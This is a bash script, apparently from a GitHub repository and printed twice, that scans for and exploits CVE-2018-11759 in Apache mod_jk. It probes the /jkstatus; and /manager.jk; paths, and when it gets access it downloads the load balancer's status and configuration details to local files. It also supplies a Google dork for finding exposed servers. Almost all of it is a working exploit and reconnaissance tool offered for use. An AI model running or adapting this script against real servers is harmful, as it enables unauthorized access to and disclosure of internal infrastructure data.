Jul10l1r4/mod_jk-CVE-2018-11759.sh

## mod_jk-CVE-2018-11759.sh
#!/usr/bin/env bash
#	     CVE 2018-11759
# Author: Julio Lira <jul10l1r4@ufrn.edu.br>
# Colaborator: Fernando Eloi <edxeloi@hotmail.com>
# date: 12/07/2018 | MM/DD/YYYY
# License: GNU GPL version 3
# Details: https://jul10l1r4.github.io/artigo/Vulnerabilidade-em-balanceadores-mod_jk-[CVE-2018-11759]/index.html
# Description: This script was a test for verify if the application is vulnerable at CVE 2018-11759.
# Google Dork: ["JK Status Manager for"]
# Vendor Homepage: [http://tomcat.apache.org/]
# Exploit Link: [https://github.com/Jul10l1r4/Identificador-CVE-2018-11759]
# Version: [0.1]
# Tested on: [Slackware, Debian, Red hat, Gentoo, Pentoo, *BSD, is compatible for all unix-like including Mac OS and others]
# Dependencies: curl, which
# CVE : [CVE-2018-11759]

# Function for save all details of load balancer
_save(){
	# Verify if exists curl in machine
	which curl > /dev/null && \
		# ok or f'ck
		printf '\n Dependence, curl found...\n' \
		|| printf '\n \033[31mInstall the curl!\033[0m\n';
	# Make a download of details and redirect for directory
	# files_cap/
  mkdir files_cap
	echo -e '\033[32m Starting balancing details download\033[0m'
	cat <<- EOF > files_cap/$(printf "$1" | cut -d "/" -f 3).data
		$(curl "$1/jkstatus;?mime=prop")
	EOF
	> /dev/null
	# show msg of OK
	printf "\n \033[32mDetails has been saved in files_cap/$(printf "$1" | cut -d "/" -f 3).data\033[0m\n"
}
# Function for send request
_req(){
	# Get status response of http and verify
	jks=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/jkstatus;" &3>/dev/null)
	echo "Response: $jks no /jkstatus"
	mjk=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/manager.jk;" &3>/dev/null)
	echo "Response: $mjk no /manager.jk"
	if [ $mjk != 404 ];then
		url="$1/manager.jk;"
		response=$mjk
	elif [ $jks != 404 ];then
		url="$1/jkstatus;"
		response=$jks
	fi
}
while read -p "Paster the URL -> " LINE; do
	_req "$LINE"
	if [ $response = 200 ];then
		printf "\n \033[31mVulnerable\033[0m\n See: $url\n"
		_save "$url"
	elif [ $response = 302 ] || [ $response = 401 ];then
		printf "\n Safe, but may suffer brute\n force attack, caution\n See: $url\n"
	else
		printf "\n \033[032mSafe, Congrats!\033[0m\n"
	fi
done
	#!/usr/bin/env bash
	# CVE 2018-11759
	# Author: Julio Lira <jul10l1r4@ufrn.edu.br>
	# Colaborator: Fernando Eloi <edxeloi@hotmail.com>
	# date: 12/07/2018 \| MM/DD/YYYY
	# License: GNU GPL version 3
	# Details: https://jul10l1r4.github.io/artigo/Vulnerabilidade-em-balanceadores-mod_jk-[CVE-2018-11759]/index.html
	# Description: This script was a test for verify if the application is vulnerable at CVE 2018-11759.
	# Google Dork: ["JK Status Manager for"]
	# Vendor Homepage: [http://tomcat.apache.org/]
	# Exploit Link: [https://github.com/Jul10l1r4/Identificador-CVE-2018-11759]
	# Version: [0.1]
	# Tested on: [Slackware, Debian, Red hat, Gentoo, Pentoo, *BSD, is compatible for all unix-like including Mac OS and others]
	# Dependencies: curl, which
	# CVE : [CVE-2018-11759]

	# Function for save all details of load balancer
	_save(){
	# Verify if exists curl in machine
	which curl > /dev/null && \
	# ok or f'ck
	printf '\n Dependence, curl found...\n' \
	\|\| printf '\n \033[31mInstall the curl!\033[0m\n';
	# Make a download of details and redirect for directory
	# files_cap/
	mkdir files_cap
	echo -e '\033[32m Starting balancing details download\033[0m'
	cat <<- EOF > files_cap/$(printf "$1" \| cut -d "/" -f 3).data
	$(curl "$1/jkstatus;?mime=prop")
	EOF
	> /dev/null
	# show msg of OK
	printf "\n \033[32mDetails has been saved in files_cap/$(printf "$1" \| cut -d "/" -f 3).data\033[0m\n"
	}
	# Function for send request
	_req(){
	# Get status response of http and verify
	jks=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/jkstatus;" &3>/dev/null)
	echo "Response: $jks no /jkstatus"
	mjk=$(curl -o /dev/null --silent --head --write-out "%{http_code}" "$1/manager.jk;" &3>/dev/null)
	echo "Response: $mjk no /manager.jk"
	if [ $mjk != 404 ];then
	url="$1/manager.jk;"
	response=$mjk
	elif [ $jks != 404 ];then
	url="$1/jkstatus;"
	response=$jks
	fi
	}
	while read -p "Paster the URL -> " LINE; do
	_req "$LINE"
	if [ $response = 200 ];then
	printf "\n \033[31mVulnerable\033[0m\n See: $url\n"
	_save "$url"
	elif [ $response = 302 ] \|\| [ $response = 401 ];then
	printf "\n Safe, but may suffer brute\n force attack, caution\n See: $url\n"
	else
	printf "\n \033[032mSafe, Congrats!\033[0m\n"
	fi
	done